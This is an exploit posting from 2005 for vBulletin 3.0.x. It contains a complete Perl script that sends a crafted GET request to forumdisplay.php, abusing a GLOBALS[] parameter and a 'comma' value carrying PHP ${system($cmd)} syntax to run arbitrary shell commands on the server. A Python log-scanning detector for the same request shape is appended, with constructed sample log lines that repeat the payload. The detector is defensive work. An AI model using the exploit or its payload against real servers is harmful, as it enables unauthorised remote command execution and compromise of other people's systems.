vbulletin 3.0.x PHP code execution
Source: pokleyzz@scan-associates.net  Author: pokleyzz  Published: 2005-02-19

#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!

use IO::Socket;

sub parse_url {
local($url) = @_;

if ($url =~ m#^(\w+):#) {
$protocol = $1;
$protocol =~ tr/A-Z/a-z/;
} else {
return undef;
}

if ($protocol eq "http") {
if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
$server = $1;
$server =~ tr/A-Z/a-z/;
$port = ($2 ne "" ? $2 : $http_port);
$path = ( $3 ? $3 : '/');
return ($protocol, $server, $port, $path);
}
return undef;
}
}

sub urlencode{
my($esc) = @_;
$esc =~ s/^\s+|\s+$//gs;
$esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg;
$esc =~ s/ /+/g;
$esc =~ s/%20/+/g;
return $esc;
}

$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);

$http_port = 80;

$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${exit()}}";

@target = parse_url($url);

$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $target[1],
PeerPort => $target[2],
) or die "\nUnable to connect\n";

$conn -> autoflush(1);
print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
while (<$conn>){
print $_;
}
close $conn;
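
A defender-side check for the request shape this script sends to forumdisplay.php (a `GLOBALS[]` parameter plus a `comma` value carrying PHP `${...}` syntax), run over web access logs. This is an added example, not part of the original script; the Common Log Format assumption, the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a Common/Combined Log Format line (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return the reasons a log line matches the request built by the script
    above; an empty list means no match."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/forumdisplay.php"):
        return []
    reasons = []
    # parse_qsl percent-decodes names and values, so encoded variants match too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.split("[", 1)[0] == "GLOBALS":
            reasons.append("GLOBALS supplied as a request parameter")
        if name == "comma" and "${" in value:
            reasons.append("PHP ${...} expression in 'comma'")
    return reasons

def scan(lines):
    """Return (line_index, reasons) for every matching line."""
    return [(i, r) for i, line in enumerate(lines) if (r := classify(line))]

# Constructed sample log lines (documentation IP range, placeholder command).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Feb/2005:10:00:01 +0000] '
    '"GET /forumdisplay.php?f=1 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [19/Feb/2005:10:00:07 +0000] '
    '"GET /forumdisplay.php?GLOBALS[]=1&f=1&cmd=CONSTRUCTED'
    '&comma={${system($cmd)}}{${exit()}} HTTP/1.1" 200 312',
    '192.0.2.66 - - [19/Feb/2005:10:00:09 +0000] '
    '"GET /forum/forumdisplay.php?GLOBALS%5B%5D=1&f=2'
    '&comma=%7B%24%7Bexit()%7D%7D HTTP/1.1" 200 0',
    '192.0.2.20 - - [19/Feb/2005:10:01:30 +0000] '
    '"GET /showthread.php?t=5&comma=%24%7Bx%7D HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG):
        print(idx, "; ".join(reasons))
```

The check only covers GET query strings as they appear in an access log; parameters sent in a POST body would need request-body logging or a WAF rule to see.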



 